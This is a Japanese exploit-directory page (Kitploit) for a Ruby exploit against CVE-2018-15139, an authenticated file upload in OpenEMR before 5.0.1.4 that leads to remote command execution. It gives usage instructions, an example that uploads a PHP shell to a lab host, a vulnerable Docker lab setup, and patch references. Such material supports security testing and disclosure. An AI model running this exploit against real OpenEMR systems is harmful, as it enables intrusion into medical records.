Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
exploit-CVE-2018-15139 — OpenEMR < 5.0.1.4 - (認証済み) ファイルアップロード - リモートコマンド実行 | Kitploit
ツール/GitHubGitHub/sec-it/exploit-cve-2018-15139
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (認証済み) ファイルアップロード - リモートコマンド実行

リポジトリを見る
2225年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OpenEMR CVE-2018-15139 エクスプロイト

OpenEMR < 5.0.1.4 - (認証済み) ファイルアップロード - リモートコード実行

CVE-2018-15139 のエクスプロイト。

使い方

$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

使用例

$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

要件

  • httpx
  • docopt.rb

gem を使用した例:

bundle install
# or
gem install httpx docopt

脆弱なソフトウェアの Docker デプロイ

警告: もちろん、この構成は本番環境での使用には適していません!

$ sudo docker-compose up

公式 OpenEMR Docker イメージではアップロードフォルダのパーミッションが壊れているため、コンテナに接続してパーミッションを修正する必要があります。例:

$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

参照

  • 対象ソフトウェア: OpenEMR
    • ホームページ: https://www.open-emr.org/
    • ソースコード: https://github.com/openemr/openemr
    • Docker: docker-compose.yml を参照
    • 脆弱なバージョン: < 5.0.1.4 (5.0.1.3 までを意味します)
    • パッチ: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

これは EDB-49998 をより良く書き直したものです。

この脆弱性は Project Insecurity によって発見されました。

元のエクスプロイトと脆弱性の分析:

  • OpenEMR が Project Insecurity によって発見された深刻な脆弱性にパッチを適用
ツールをダウンロード